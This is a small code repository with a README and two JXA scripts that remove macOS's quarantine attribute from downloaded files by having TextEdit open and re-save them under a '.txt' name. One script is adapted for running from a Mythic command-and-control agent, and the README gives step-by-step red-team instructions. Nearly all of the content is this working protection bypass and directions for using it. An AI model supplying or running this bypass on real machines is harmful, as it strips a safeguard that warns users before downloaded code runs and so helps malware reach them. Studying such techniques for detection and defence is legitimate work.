├── LICENSE ├── README.md ├── remove-quarantine-Mythic.js └── removequarantine.js /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2021, Cedric Owens 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JXA-RemoveQuarantine 2 | JXA script based on research by Jeff Johnson that uses TextEdit to remove the quarantine attribute from files. Jeff's original research is here: https://lapcatsoftware.com/articles/sandbox-escape.html 3 | 4 | This script relies on: 5 | 6 | 1. The file extension being .txt. The file type can be any file type as long as ".txt" is appended to the end. The reason for this is the script will cause macOS to use the default opener for .txt file types (which is TextEdit) in order to leverage TextEdit's entitlement (com.apple.security.files.user-selected.executable) which gives it the ability to remove the quarantine attribute when the file is saved. I was unable to find a way to make the objc "withApplication:@TextEdit" call in JXA so I used this method as a fallback to ensure TextEdit is opened. 7 | 8 | 2. Terminal having access to control TextEdit. If Terminal does not have this access, a pop up will occur requesting to allow Terminal access to control TextEdit. 9 | 10 | This may not be feasible for red team ops due to the brief pop up that occurs when TextEdit opens the file as well as due to condition number 2 above. However, this is an interesting demo into how TextEdit can be leveraged to remove file quarantine attributes. 11 | 12 | To run locally: 13 | 14 | 1. Download a test/target file from the browser, which will add the quarantine attribute 15 | 16 | 2. Add ".txt" extension to whatever your filename is. (ex: if you are downloading "file.js" you will rename it to "file.js.txt") 17 | 18 | 3. Edit the removequarantine.js file and change the "NSWorkspace.sharedWorkspace.openFile" path value to your target file. 19 | 20 | 4. Run via Terminal: 21 | 22 | > osascript removequarantine.js 23 | 24 | 5. Check the quarantine attribute after step 3 and it will be removed by TextEdit (ex: xattr [filename]) 25 | 26 | 6. You can then rename your file back to the original name 27 | 28 | ------------- 29 | 30 | ## Running via Mythic 31 | 32 | You can run this via Mythic's jsimport function. However, **if you gain access via an office macro the sandbox seems to prevent TextEdit from writing the file after opening which will cause this not to work** (even when I tried prepending ~$ to the front of the filename this still did not work). If you have non-sandboxed access to a host then this will work via Mythic. 33 | 34 | Steps: 35 | 36 | 1. Edit the remove-quarantine-Mythic.js file and change the "NSWorkspace.sharedWorkspace.openFile" path value to your target file. 37 | 38 | Then from a Mythic agent run: 39 | 40 | 2. > jsimport remove-quarantine-Mythic.js 41 | 42 | 3. > jsimport_call Remove() 43 | 44 | 4. Quarantine attribute will be removed from the file 45 | 46 | -------------------------------------------------------------------------------- /remove-quarantine-Mythic.js: -------------------------------------------------------------------------------- 1 | function Remove() { 2 | ObjC.import('Cocoa'); 3 | ObjC.import('stdlib'); 4 | var app = Application.currentApplication(); 5 | app.includeStandardAdditions = true; 6 | 7 | try{ 8 | $.NSWorkspace.sharedWorkspace.openFile("/Users/dev/Desktop/mypytest.py.txt"); 9 | var start = $.NSAppleScript.alloc.initWithSource("tell application \"TextEdit\"\rsave document 1\rquit\rend tell"); 10 | start.executeAndReturnError($()); 11 | 12 | return "Done" 13 | } 14 | catch(err){ 15 | return err 16 | } 17 | } 18 | 19 | -------------------------------------------------------------------------------- /removequarantine.js: -------------------------------------------------------------------------------- 1 | ObjC.import('Cocoa'); 2 | ObjC.import('stdlib'); 3 | 4 | var app = Application.currentApplication(); 5 | app.includeStandardAdditions = true; 6 | 7 | try { 8 | $.NSWorkspace.sharedWorkspace.openFile("/Users/dev/Desktop/mypytest.py.txt"); 9 | var start = $.NSAppleScript.alloc.initWithSource("tell application \"TextEdit\"\rsave document 1\rquit\rend tell"); 10 | start.executeAndReturnError($()); 11 | } 12 | catch(err){ 13 | console.log(err) 14 | } 15 | --------------------------------------------------------------------------------